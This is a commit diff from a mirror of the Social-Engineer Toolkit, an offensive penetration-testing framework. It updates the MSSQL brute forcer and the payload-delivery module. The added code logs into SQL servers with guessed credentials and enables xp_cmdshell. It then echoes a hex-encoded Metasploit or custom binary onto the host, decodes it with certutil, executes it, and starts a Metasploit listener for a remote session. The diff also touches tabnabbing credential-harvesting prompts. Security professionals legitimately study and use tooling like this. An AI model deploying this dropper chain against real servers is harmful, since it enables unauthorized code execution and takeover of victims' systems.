Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2025-04-04 23:06:11 +00:00
Code Issues Projects Releases Packages Wiki Activity

multiple fixes to SQL attack vectors

Browse source
This commit is contained in:
TrustedSec 2016-04-20 10:14:48 -04:00
parent b72d324268
commit f184928006
5 changed files with 159 additions and 159 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
readme/CHANGELOG
View file

@ -1,3 +1,19 @@
~~~~~~~~~~~~~~~~
version 7.1
~~~~~~~~~~~~~~~~
* added so you can use multiple IP addreses based on space on mssql bruter
* rewrote mssql bruter to incorporate pymssql
* rewrote delivery payload method to use certuil instead of windows debug method
* added better description around handling tabnabbing
* added better ability to handle powershell injection
* rewrote and moved off impacket to pymssql
* added import own binary for mssql deployment
* changed deployment method from old base64 conversion bypass to Matthew Graeber's certutil binary method
* added option to import new file or metasploit file for meterpreter bypass method
* added better handling around binary injection technique for binary dropper method
* added better threading within brute forcing sql accounts
~~~~~~~~~~~~~~~~
version 7.0.6
~~~~~~~~~~~~~~~~

24
src/core/fasttrack.py
View file

@ -53,7 +53,7 @@ try:
choice = "1"
if choice == "1":
range = raw_input(setprompt(
["19", "21", "22"], "Enter the CIDR or single IP (ex. 192.168.1.1/24)"))
["19", "21", "22"], "Enter the CIDR, single IP, or multiple IPs seperated by space (ex. 192.168.1.1/24)"))
if choice == "2":
while 1:
range = raw_input(setprompt(
@ -90,13 +90,21 @@ try:
sql_servers = ''
print_status(
"Hunting for SQL servers.. This may take a little bit.")
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
if "/" or " " in str(range):
if "/" in str(range):
iprange = printCIDR(range)
iprange = iprange.split(",")
for host in iprange:
sqlport = get_sql_port(host)
if sqlport != None:
sql_servers = sql_servers + host + ":" + sqlport + ","
else:
range1 = range.split(" ")
for ip in range1:
sqlport = get_sql_port(ip)
if sqlport != None:
sql_servers = sql_servers + ip + ":" + sqlport + ","
else:
# use udp discovery to get the SQL server IDP through
# 1434

6
src/core/setcore.py
View file

@ -260,7 +260,7 @@ def print_error(message):
def get_version():
define_version = '7.0.6'
define_version = '7.1'
return define_version
class create_menu:
@ -892,8 +892,8 @@ def show_banner(define_version, graphic):
print(bcolors.BLUE + """
[---] The Social-Engineer Toolkit (""" + bcolors.YELLOW + """SET""" + bcolors.BLUE + """) [---]
[---] Created by:""" + bcolors.RED + """ David Kennedy """ + bcolors.BLUE + """(""" + bcolors.YELLOW + """ReL1K""" + bcolors.BLUE + """) [---]
[---] Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """ [---]
[---] Codename: '""" + bcolors.YELLOW + """Rememb""" + bcolors.ENDC + bcolors.BOLD + """Rance""" + bcolors.ENDC + bcolors.BLUE + """' [---]
[---] Version: """ + bcolors.RED + """%s""" % (define_version) + bcolors.BLUE + """ [---]
[---] Codename: '""" + bcolors.YELLOW + """Ride the Lightning""" + bcolors.ENDC + bcolors.BLUE + """' [---]
[---] Follow us on Twitter: """ + bcolors.PURPLE + """@TrustedSec""" + bcolors.BLUE + """ [---]
[---] Follow me on Twitter: """ + bcolors.PURPLE + """@HackingDave""" + bcolors.BLUE + """ [---]
[---] Homepage: """ + bcolors.YELLOW + """https://www.trustedsec.com""" + bcolors.BLUE + """ [---]

270
src/fasttrack/mssql.py
View file

@ -1,6 +1,5 @@
#!/usr/bin/env python
from src.core.setcore import *
import src.core.tds as tds
import sys
import subprocess
import socket
@ -10,34 +9,21 @@ import time
import binascii
import base64
import shutil
import _mssql
#
# this is the mssql modules
#
# define the base path
definepath = definepath()
operating_system = check_os()
msf_path = meta_path()
try:
from impacket import tds
except ImportError:
if os.path.isdir("/usr/share/pyshared/impacket"):
sys.path.append("/usr/share/pyshared/impacket")
import tds
sys.path.append(definepath)
else:
print("[!] Impacket is not installed. This menu will not work.")
sys.exit()
#
# this is the brute forcer
#
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
@ -65,14 +51,7 @@ def brute(ipaddr, username, port, wordlist):
ipaddr = ipaddr.split(":")
port = ipaddr[1]
ipaddr = ipaddr[0]
#target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
sql_server = tds.MSSQL(str(ipaddr), int(port))
# print that we were successful
sql_server.connect()
#target_server = False
target_server = sql_server.login("master", username, passwords)
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
if target_server:
print_status("\nSuccessful login with username %s and password: %s" % (
username, passwords))
@ -96,30 +75,26 @@ def brute(ipaddr, username, port, wordlist):
ipaddr, username))
return False
#
# this will deploy an already prestaged executable that reads in hexadecimal and back to binary
#
def deploy_hex2binary(ipaddr, port, username, password):
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
# base variable used to select payload option
choice1 = "1"
conn = _mssql.connect(ipaddr + ":" + str(port), username, password)
print_status("Enabling the xp_cmdshell stored procedure...")
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;GO;RECONFIGURE;GO;exec master.dbo.sp_configure 'xp_cmdshell', 1;GO;RECONFIGURE;GO")
except: pass
# just throw a simple command via powershell to get the output
try:
mssql.sql_query("exec master..xp_cmdshell 'powershell -Version'")
bundle = str(capture(mssql.printRows))
# remove null byte terminators from capture output
bundle = bundle.replace("\\x00", "")
# search for parameter version - standard output for powershell -Version
# command
match = re.search("parameter version", bundle)
# if we have a match we have powershell installed
if match:
print_status("Powershell was detected on the remote system.")
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary""")
choice = raw_input("Enter your choice:\n\n1.) Use PowerShell Injection (recommended)\n2.) Use Certutil binary conversion\n\nEnter your choice [1]:")
if choice == "": choice = "1"
if choice == "1":
print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input(
"Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
@ -127,41 +102,63 @@ def deploy_hex2binary(ipaddr, port, username, password):
print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
print_status(
"Powershell not detected, attempting Windows debug method.")
print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print err
except Exception as err:
print err
# if we don't have powershell
if option == "2":
try:
module_reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
print_status("Connection established with SQL Server...")
print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
fileopen = open("%s/1msf.exe" % (web_path), "rb")
# give option to use msf or your own
print_status("You can either select to use a default Metasploit payload here or import your own in order to deliver to the system. Note that if you select your own, you will need to create your own listener at the end in order to capture this.")
choice1 = raw_input("\n\n1.) Use Metasploit (default)\n2.) Select your own\n\nEnter your choice[1]:")
if choice1 == "": choice1 = "1"
if choice1 == "2":
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
else:
print_error("File not found! Try again.")
filename = raw_input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(filename):
fileopen = open(filename, "rb")
else:
print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
try:
module_reload(src.core.payloadgen.create_payloads)
except:
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(setdir + "/set.payload"):
web_path = (setdir + "/web_clone/")
# then we are using metasploit
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
web_path = (setdir)
# if it isn't there yet
if not os.path.isfile(setdir + "/1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(setdir, setdir), shell=True).wait()
if choice1 == "1":
fileopen = open("%s/1msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
@ -171,17 +168,17 @@ def deploy_hex2binary(ipaddr, port, username, password):
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
try:
module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn(
"%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(setdir + "/set.payload"):
if operating_system == "posix":
try:
module_reload(pexpect)
except:
import pexpect
print_status("Starting the Metasploit listener...")
msf_path = meta_path()
child2 = pexpect.spawn("%smsfconsole -r %s/meta_config\r\n\r\n" % (meta_path(), setdir))
# random executable name
random_exe = generate_random_string(10, 15)
@ -189,7 +186,6 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
print_status(
"Using universal powershell x86 process downgrade attack..")
@ -263,71 +259,46 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
if option == "2":
# we selected hex to binary
fileopen = open("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
print_status("Deploying initial debug stager to the system.")
random_file = generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
print_status("Deploying stager payload (hex): " +
bcolors.BOLD + str(print_line) + bcolors.ENDC)
mssql.sql_query("exec master..xp_cmdshell '%s>> %s'" %
(line, random_file))
print_status("Converting the stager to a binary...")
# here we convert it to a binary
mssql.sql_query("exec master..xp_cmdshell 'debug<%s'" % (random_file))
print_status("Conversion complete. Cleaning up...")
# delete the random file
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
print_status(
"Sending the main payload via to be converted back to a binary.")
print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = open(setdir + "/payload.hex", "r")
print_status("Dropping inital begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > %s.crt'" % (random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "":
break
print_status("Deploying payload to victim machine (hex): " +
bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
mssql.sql_query(
"exec master..xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
print_status(
"Delivery complete. Converting hex back to binary format.")
mssql.sql_query(
"exec master..xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
mssql.sql_query("exec master..xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
print_status("Cleaning up old files..")
mssql.sql_query("exec master..xp_cmdshell 'del %s'" % (random_exe))
print_status("Deploying payload to victim machine (hex): " + bcolors.BOLD + str(data) + bcolors.ENDC + "\n")
conn.execute_query("exec master..xp_cmdshell 'echo %s >> %s.crt'" % (data, random_exe))
print_status("Delivery complete. Converting hex back to binary format.")
print_status("Dropping end header for binary format converstion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> %s.crt'" % (random_exe))
print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode %s.crt %s.exe'" % (random_exe, random_exe))
print_status("Executing the payload - magic has happened and now its time for that moment.. You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '%s.exe'" % (random_exe))
# if we are using SET payload
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
except:
pass
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
print_status("Spawning seperate child process for listener...")
try:
shutil.copyfile(setdir + "/web_clone/x", definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen(
"python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if check_options("PORT=") != 0:
port = check_options("PORT=")
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# if for some reason the port didnt get created we default to 443
else:
port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
@ -341,29 +312,33 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "1":
print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '%s'" % (powershell_command))
#mssql.sql_query("exec master..xp_cmdshell '%s'" % (powershell_command))
thread.start_new_thread(mssql.sql_query, (sql_command,))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
print_status("Triggering payload stager...")
sql_command = ("xp_cmdshell '%s'" % (random_exe))
alphainject = ""
if os.path.isfile(setdir + "meterpreter.alpha"):
alphainject = fileopen(setdir + "meterpreter.alpha", "r").read()
sql_command = ("xp_cmdshell '%s.exe %s'" % (random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(mssql.sql_query, (sql_command,))
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if os.path.isfile(setdir + "/set.payload"):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(setdir + "/set.payload"):
os.system("python ../../payloads/set_payloads/listener.py")
try:
os.remove("x")
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
except:
pass
#
@ -371,18 +346,17 @@ def deploy_hex2binary(ipaddr, port, username, password):
#
def cmdshell(ipaddr, port, username, password, option):
# connect to SQL server
import src.core.tds as tds
mssql = tds.MSSQL(ipaddr, int(port))
mssql.connect()
mssql.login("master", username, password)
print_status("Connection established with SQL Server...")
print_status("Attempting to re-enable xp_cmdshell if disabled...")
try:
mssql.sql_query(
"exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
mssql.sql_query("exec master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;exec master.dbo.sp_configure 'xp_cmdshell', 1;RECONFIGURE;")
except Exception as e:
pass
print_status(
"Enter your Windows Shell commands in the xp_cmdshell - prompt...")
print_status("Enter your Windows Shell commands in the xp_cmdshell - prompt...")
while 1:
# prompt mssql
cmd = input("mssql>")

2
src/webattack/harvester/harvester.py
View file

@ -610,6 +610,8 @@ for line in fileopen:
line = line.rstrip()
if line == 'tabnabbing':
print(bcolors.RED + "\n[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.")
print("You may need to copy /var/www/* into /var/www/html depending on where your directory structure is.")
raw_input("Press {return} if you understand what we're saying here.")
if line == 'webjacking':
print(bcolors.RED + "\n[*] Web Jacking Attack Vector is Enabled...Victim needs to click the link.")